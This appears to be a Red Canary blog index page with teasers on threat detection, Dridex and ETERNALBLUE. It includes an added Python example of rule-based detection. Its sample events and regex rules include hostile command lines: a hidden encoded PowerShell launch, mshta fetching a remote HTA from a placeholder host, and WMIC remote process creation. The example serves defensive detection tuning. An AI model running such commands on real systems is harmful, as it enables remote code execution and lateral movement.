
Improve Your Threat Detection: Inspect All of the New Everythings

Keith McCammon, Chief Security Officer

When asked to describe the potential threats that Red Canary detects and confirms, we tend to frame the discussion around several big buckets:

Bad things – the most obvious: malware and unwanted software, primarily.
Good things gone bad – legitimate applications and services leveraged by a malicious actor... think PowerShell, WMIC, MSHTA, etc.
Unusual things – why does your CEO … Read More


Shutting Down a Hands-on Keyboard Attack: Two Joes vs One Threat Actor

Suzanne Moore

It was a Friday afternoon when the alert came in. One of Red Canary’s customers had experienced a breach. The compromise occurred on an unsecured endpoint—an isolated development box that was used for testing. The customer had deployed Red Canary Managed Endpoint Detection & Response (MEDR) across its most critical endpoints: domain controllers, front-facing web server, executive endpoints, databases, and … Read More


Alert Fatigue: How to Tune Out the Noise and Reclaim Your Hours

Keshia LeVan

As an analyst, reviewing events generally takes up a pretty good chunk of your day. And as much as there is a lot of hype about moving away from “signature-based detection,” many detection solutions are at their core just based on a rule (or set of rules) with some Boolean logic and pattern matching. That’s not to say they aren’t … Read More
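The two excerpts above describe the same mechanism from opposite ends: the "good things gone bad" bucket (PowerShell, WMIC, MSHTA used by an attacker) is what a detection rule looks for, and the rule itself is, as the alert-fatigue post says, Boolean logic plus pattern matching over an event. The following is an added, self-contained example of that idea written for this page; it is not Red Canary's detection logic or any product's rule syntax. The process events, rule names, the `sccm-agent.exe` parent and the suppression list are all constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample process events (invented for this example, not real telemetry).
# Each record carries the parent image, the spawned image, and its command line.
EVENTS = [
    {"host": "ws01", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"host": "ws02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"host": "ws03", "parent": "outlook.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/a.hta"},
    {"host": "dc01", "parent": "services.exe", "image": "wmic.exe",
     "cmdline": "wmic.exe /node:ws02 process call create \"cmd /c whoami\""},
    {"host": "ws04", "parent": "sccm-agent.exe", "image": "wmic.exe",   # hypothetical mgmt agent
     "cmdline": "wmic.exe os get caption"},
    {"host": "ws05", "parent": "excel.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe budget.txt"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
LOLBINS = {"powershell.exe", "mshta.exe", "wmic.exe"}   # "good things" that go bad

# A rule is a name plus a predicate over one event: Boolean logic and pattern matching.
RULES = {
    # Broad and noisy: any use of a living-off-the-land binary at all.
    "any_lolbin": lambda e: e["image"] in LOLBINS,
    # Office application spawning a scripting/admin host.
    "office_spawns_lolbin": lambda e: (
        e["parent"] in OFFICE_PARENTS and e["image"] in LOLBINS),
    # PowerShell launched with an encoded command (-e/-ec/-enc/-EncodedCommand).
    "powershell_encoded": lambda e: (
        e["image"] == "powershell.exe"
        and re.search(r"(?i)\s-(e|ec|enc|encodedcommand)\b", e["cmdline"]) is not None),
    # MSHTA pulling an HTA from a URL rather than a local file.
    "mshta_remote_url": lambda e: (
        e["image"] == "mshta.exe"
        and re.search(r"(?i)https?://", e["cmdline"]) is not None),
    # WMIC creating a process on a remote node (lateral movement pattern).
    "wmic_remote_process_create": lambda e: (
        e["image"] == "wmic.exe"
        and re.search(r"(?i)/node:\S+.*process\s+call\s+create", e["cmdline"]) is not None),
}

# Tuning: per-rule suppressions that name a known-good context instead of deleting the rule.
SUPPRESSIONS = {
    "any_lolbin": [lambda e: e["parent"] == "sccm-agent.exe"],  # hypothetical known-good parent
}


def run_rules(events, rules, suppressions=None):
    """Return {rule_name: [hosts]} for each event matching a rule and not suppressed."""
    suppressions = suppressions or {}
    hits = defaultdict(list)
    for e in events:
        for name, pred in rules.items():
            if not pred(e):
                continue
            if any(sup(e) for sup in suppressions.get(name, [])):
                continue  # matched, but tuned out as known-good
            hits[name].append(e["host"])
    return dict(hits)


def alert_count(hits):
    """Total number of alerts an analyst would have to review."""
    return sum(len(hosts) for hosts in hits.values())


if __name__ == "__main__":
    raw = run_rules(EVENTS, RULES)
    tuned = run_rules(EVENTS, RULES, SUPPRESSIONS)
    print("untuned alerts:", alert_count(raw), raw)
    print("tuned alerts:  ", alert_count(tuned), tuned)
```

The narrow rules fire only on the events that combine a suspicious parent, binary and command line, while the broad `any_lolbin` rule fires on every WMIC and PowerShell launch; the suppression removes the management-agent noise from that rule without touching the rules that carry the signal, which is the tuning trade-off the alert-fatigue post describes.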


Threat Hunting for Dridex Attacks: Top Questions from Security Teams

Joe Moles

I recently spoke on a threat hunting webinar with our partner Carbon Black in which we dove into Dridex attacks: how they work, why they’re so effective, and how security teams can detect them through a proactive threat hunting approach. For anyone who’s unfamiliar with Dridex, the malware evades signature-based detection and is built to harvest the banking credentials of … Read More

Using Cb Response to Mitigate ETERNALBLUE

Keith McCammon, Chief Security Officer

In case you’ve been under a rock: There’s a wee problem with ransomware, fueled by the public release of a handful of high-quality access (exploit) and persistence (backdoor) utilities. Most recently, these have manifested in the form of the WannaCry and Petya epidemics. While good intelligence on Petya infection vectors and lateral movement techniques is in a state of … Read More


An Investment Firm’s Information Security Strategy: Layering Multiple Partners for a Robust Line of Defense

Suzanne Moore

Cybercriminals attacked the financial services sector more than any other industry last year. A recent research report found that 75% of the top 20 U.S. commercial banks (by revenue) are infected with malware. And another analysis on cyber risk management found that 69% of incidents went undetected by financial security teams for weeks to months. So what is the best line of … Read More


Common Security Mistake #1: Lack of Visibility

Phil Hagen

Even mature security teams sometimes make mistakes. This series of blog posts will address common mistakes based on real-world engagements with teams of all sizes and maturity levels. The author, Phil Hagen, is a long-time information security strategist, digital forensics practitioner, and SANS Certified Instructor. Part of Phil’s role at Red Canary is to educate organizations about ways to solve problems … Read More